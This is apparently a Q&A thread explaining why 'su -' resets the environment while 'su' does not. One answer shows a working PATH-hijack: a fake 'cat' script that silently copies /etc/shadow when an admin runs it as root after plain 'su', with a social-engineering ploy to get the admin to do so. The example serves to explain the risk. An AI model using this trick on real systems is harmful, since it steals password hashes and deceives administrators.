Why do we use su - and not just su?
su -
invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.
su
just switches the user, providing a normal shell with an environment nearly the same as with the old user.
Imagine, you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.
$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0
$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"
Now, you ask your admin why you can't cat
the dummy file in your home folder, it just won't work!
$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!
If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:
$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit
Wow! Thanks, super admin!
$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy
He, he.
You maybe noticed that the corrupted $PATH
variable was not reset. This wouldn't have happened, if the admin invoked su -
instead.
su -
logs you in completely as root, whereas su
makes it so you are pretending to be root.
The most obvious example of this is that ~
is root's home directory if you use su -
, but your own home directory if you use su
.
Depending on your system, it may also mean differences in prompt, PATH
, or history file.
So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using su -
, but if you are both using su
, there may be differences due to you having different shell configurations.
On the other hand, if you want to run a command as root but using your own configuration, then maybe su
is better for you.
Also don't forget about sudo
, which has a -s
option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.
The main difference is :
su - username
sets up the shell environment as if it were a clean login as the specified user, it access and use specified users environment variables,
su username
just starts a shell with current environment settings for the specified user.
If username is not specified with su
and su -
, the root account is implied as default.